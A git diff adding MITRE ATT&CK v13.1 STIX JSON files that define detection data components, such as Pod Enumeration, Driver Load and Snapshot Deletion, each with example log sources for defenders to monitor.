b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--071a09b1-8945-46fd-8bb7-6bcc89400963.json new file mode 100644 index 0000000000000000000000000000000000000000..cc8e9972621ba1a7fb247f34c53944154db66262 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--071a09b1-8945-46fd-8bb7-6bcc89400963.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--a3b82746-fe9b-4746-b715-f084e7fc7009", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--071a09b1-8945-46fd-8bb7-6bcc89400963", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Image Modification", + "description": "Changes made to a virtual machine image, including setting and/or control data (ex: Azure Compute Service Images PATCH)", + "x_mitre_data_source_ref": "x-mitre-data-source--1ac0ca69-e07e-4b34-9061-e4588e146c52", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--07688e40-a7fa-4436-937f-1216674341a0.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--07688e40-a7fa-4436-937f-1216674341a0.json new file mode 100644 index 0000000000000000000000000000000000000000..43db075ed4df82a9c5bbdb092b8182e0c69ffb42 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--07688e40-a7fa-4436-937f-1216674341a0.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--80169b02-7ae4-4f7a-bfe0-65400d8b27d2", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--07688e40-a7fa-4436-937f-1216674341a0", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Pod Enumeration", + "description": "An extracted list of pods within a cluster (ex: kubectl get pods)", + "x_mitre_data_source_ref": "x-mitre-data-source--06bb1e05-533b-4de3-ae87-9b99910465cf", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--0dcbbf4f-929c-489a-b66b-9b820d3f7f0e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--0dcbbf4f-929c-489a-b66b-9b820d3f7f0e.json new file mode 100644 index 0000000000000000000000000000000000000000..1d03a716bf04d58a7170c128d051572a971e4316 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--0dcbbf4f-929c-489a-b66b-9b820d3f7f0e.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--5cdca9f6-49dd-40f8-bc0e-b4be19622b18", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--0dcbbf4f-929c-489a-b66b-9b820d3f7f0e", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.275Z", + "name": "Response Content", + "description": "Logged network traffic in response to a scan showing both protocol header and body values", + "x_mitre_data_source_ref": "x-mitre-data-source--38fe306c-bdec-4f3d-8521-b72dd32dbd17", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--0f72bf50-35b3-419d-ab95-70f9b6a818dd.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--0f72bf50-35b3-419d-ab95-70f9b6a818dd.json new file mode 100644 index 0000000000000000000000000000000000000000..7bbcd69f9b489efd7d2e6084ebec9abe9e4a96a6 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--0f72bf50-35b3-419d-ab95-70f9b6a818dd.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--ef0414d2-6fca-4ff0-93fd-fb8bc0bfddb2", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--0f72bf50-35b3-419d-ab95-70f9b6a818dd", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.275Z", + "name": "Volume Metadata", + "description": "Contextual data about a cloud volume and activity around it, such as id, type, state, and size", + "x_mitre_data_source_ref": "x-mitre-data-source--b0b6d26f-3747-4444-ac7a-239a6ff80cb5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1067aa74-5796-4d9b-b4f1-a4c9eb6fd9da.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1067aa74-5796-4d9b-b4f1-a4c9eb6fd9da.json new file mode 100644 index 0000000000000000000000000000000000000000..d1abd534db55340c70ebab3e64dac7ce4503b70c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1067aa74-5796-4d9b-b4f1-a4c9eb6fd9da.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--19f6f090-62a0-486d-bae4-f33bd97a69e9", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--1067aa74-5796-4d9b-b4f1-a4c9eb6fd9da", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.275Z", + "name": "Response Metadata", + "description": "Contextual data about an Internet-facing resource gathered from a scan, such as running services or ports", + "x_mitre_data_source_ref": "x-mitre-data-source--38fe306c-bdec-4f3d-8521-b72dd32dbd17", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1177a4c5-31c8-400c-8544-9071166afa0e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1177a4c5-31c8-400c-8544-9071166afa0e.json new file mode 100644 index 0000000000000000000000000000000000000000..c527d0b9a4796174c35071fd485bf7fabaf4462c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1177a4c5-31c8-400c-8544-9071166afa0e.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--50cf176a-ca2d-45e0-8707-aefd481e92d0", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--1177a4c5-31c8-400c-8544-9071166afa0e", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Windows Registry Key Deletion", + "description": "Removal of a Registry Key (ex: Windows EID 4658 or Sysmon EID 12)", + "x_mitre_data_source_ref": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1361e324-b594-4c0e-a517-20cee32b8d7f.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1361e324-b594-4c0e-a517-20cee32b8d7f.json new file mode 100644 index 0000000000000000000000000000000000000000..073dbedc9a2d2a7d7d4371960153aa7b8eddcd30 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1361e324-b594-4c0e-a517-20cee32b8d7f.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--2ebf375d-060b-4132-a64f-c868864e17bd", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--1361e324-b594-4c0e-a517-20cee32b8d7f", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Instance Stop", + "description": "Deactivation or stoppage of an instance (ex: instance.stop within GCP Audit Logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--167b48f7-76e9-4fcb-9e8d-7121f7bf56c3.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--167b48f7-76e9-4fcb-9e8d-7121f7bf56c3.json new file mode 100644 index 0000000000000000000000000000000000000000..284cf9e885b66e2eae68d9ef1c2fa5f509a34d8a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--167b48f7-76e9-4fcb-9e8d-7121f7bf56c3.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--faa5a986-c251-4a93-bad6-10779760d528", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-20T20:19:58.845Z", + "name": "Malware Content", + "description": "Code, strings, and other signatures that compromise a malicious payload", + "x_mitre_data_source_ref": "x-mitre-data-source--b86d9b40-5fbe-4ef1-8dc3-263eff26f495", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--167b48f7-76e9-4fcb-9e8d-7121f7bf56c3", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--16e07530-764b-4d83-bae0-cdbfc31bf21d.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--16e07530-764b-4d83-bae0-cdbfc31bf21d.json new file mode 100644 index 0000000000000000000000000000000000000000..1656521a66aa9d0ec6c8f7479ab050ac9d416fa3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--16e07530-764b-4d83-bae0-cdbfc31bf21d.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--550c2fa4-a755-4d05-a00d-862c03b7dbb1", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--16e07530-764b-4d83-bae0-cdbfc31bf21d", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Snapshot Deletion", + "description": "Removal of a snapshot (ex: AWS delete-snapshot)", + "x_mitre_data_source_ref": "x-mitre-data-source--6d7de3b7-283d-48f9-909c-60d123d9d768", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba.json new file mode 100644 index 0000000000000000000000000000000000000000..1ead46c0da56acebd35ea62310e941f0de83c2de --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--51b46536-0307-42f1-a4b8-45c948bbf56d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-20T20:18:06.745Z", + "name": "Network Connection Creation", + "description": "Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6.json new file mode 100644 index 0000000000000000000000000000000000000000..43b72658ad4e3da53239dcbe8d7c5da25a10225b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--fe130f25-37b8-4d57-9ba1-f303cf282ee2", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Process Access", + "description": "Opening of a process by another process, typically to read memory of the target process (ex: Sysmon EID 10)", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--18b236d8-7224-488f-9d2f-50076a0f653a.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--18b236d8-7224-488f-9d2f-50076a0f653a.json new file mode 100644 index 0000000000000000000000000000000000000000..049203be3336da02690ef978e7cee0abe67f6478 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--18b236d8-7224-488f-9d2f-50076a0f653a.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--b8ee3c88-70a6-42c3-b3f6-e63691101fa4", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--18b236d8-7224-488f-9d2f-50076a0f653a", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Active Directory Object Creation", + "description": "Initial construction of a new active directory object (ex: Windows EID 5137)", + "x_mitre_data_source_ref": "x-mitre-data-source--d6188aac-17db-4861-845f-57c369f9b4c8", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1dad5aa4-4bb5-45e4-9e42-55d40003cfa6.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1dad5aa4-4bb5-45e4-9e42-55d40003cfa6.json new file mode 100644 index 0000000000000000000000000000000000000000..67a9e2ed0c39906c883889fbf0e27a218f3905a5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--1dad5aa4-4bb5-45e4-9e42-55d40003cfa6.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--46866fe2-8c24-4e6f-98b6-6bb452767bbf", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--1dad5aa4-4bb5-45e4-9e42-55d40003cfa6", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.275Z", + "name": "Certificate Registration", + "description": "Queried or logged information highlighting current and expired digital certificates (ex: Certificate transparency)", + "x_mitre_data_source_ref": "x-mitre-data-source--29aa4e0e-4a26-4f79-a9bc-1ae66df1c923", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71.json new file mode 100644 index 0000000000000000000000000000000000000000..808159ab8c0d71c258ee2919b8bddbe7badb0006 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--5cf7b3f2-799d-485c-8716-b96fcdd2f9d2", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "File Access", + "description": "Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663)", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--23e4ee78-26f3-4fcf-ba43-ab953962f96c.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--23e4ee78-26f3-4fcf-ba43-ab953962f96c.json new file mode 100644 index 0000000000000000000000000000000000000000..9260344c6ba7b7b6678999d1d866c866e990d98c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--23e4ee78-26f3-4fcf-ba43-ab953962f96c.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--c1719fb5-33ef-4c62-84ac-e10b20b2f7d8", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--23e4ee78-26f3-4fcf-ba43-ab953962f96c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Kernel Module Load", + "description": "An object file that contains code to extend the running kernel of an OS, typically used to add support for new hardware (as device drivers) and/or filesystems, or for adding system calls", + "x_mitre_data_source_ref": "x-mitre-data-source--8765a845-dea1-4cd1-a56f-f54939b7ab9e", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--2a80d95f-08c4-48e3-833e-151ef19d90f5.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--2a80d95f-08c4-48e3-833e-151ef19d90f5.json new file mode 100644 index 0000000000000000000000000000000000000000..fa0c1acd8f0cbe75de261a096b011cf1b7e4c7d5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--2a80d95f-08c4-48e3-833e-151ef19d90f5.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--1bff6f5f-91a7-4252-a4f3-4e9b42107f26", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--2a80d95f-08c4-48e3-833e-151ef19d90f5", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Instance Enumeration", + "description": "An extracted list of instances within a cloud environment (ex: instance.list within GCP Audit Logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c.json new file mode 100644 index 0000000000000000000000000000000000000000..cbc55e52a727a4896e4e1515254472d03f708f09 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--cbe79435-e5c5-4fcf-a01d-7d260941f850", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "File Creation", + "description": "Initial construction of a new file (ex: Sysmon EID 11)", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--2e521444-7295-4dec-96c1-7595b2df7811.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--2e521444-7295-4dec-96c1-7595b2df7811.json new file mode 100644 index 0000000000000000000000000000000000000000..727c9a774863c8916fc74cef0ab541ba824473e7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--2e521444-7295-4dec-96c1-7595b2df7811.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--60def6ca-45df-4392-8bf2-08790094eb44", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--2e521444-7295-4dec-96c1-7595b2df7811", + "created": "2021-10-20T15:05:19.275Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Queried domain name system (DNS) registry data highlighting current domain to IP address resolutions (ex: dig/nslookup queries)", + "modified": "2022-05-02T23:19:55.148Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Active DNS", + "x_mitre_data_source_ref": "x-mitre-data-source--dd75f457-8dc0-4a24-9ae5-4b61c33af866", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3551476e-14f5-4e48-a518-e82135329e03.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3551476e-14f5-4e48-a518-e82135329e03.json new file mode 100644 index 0000000000000000000000000000000000000000..0b849a763c9611c30f07650e37b6f070eb538c17 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3551476e-14f5-4e48-a518-e82135329e03.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--6cfda767-1b0f-45bb-a9ff-cb6965bfef7a", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--3551476e-14f5-4e48-a518-e82135329e03", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Driver Load", + "description": "Attaching a driver to either user or kernel-mode of a system (ex: Sysmon EID 6)", + "x_mitre_data_source_ref": "x-mitre-data-source--9ec8c0d7-6137-456f-b829-c5f8b96ba054", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c.json new file mode 100644 index 0000000000000000000000000000000000000000..96d62414126fc4726e9ebdf1ece5d011dc348338 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": 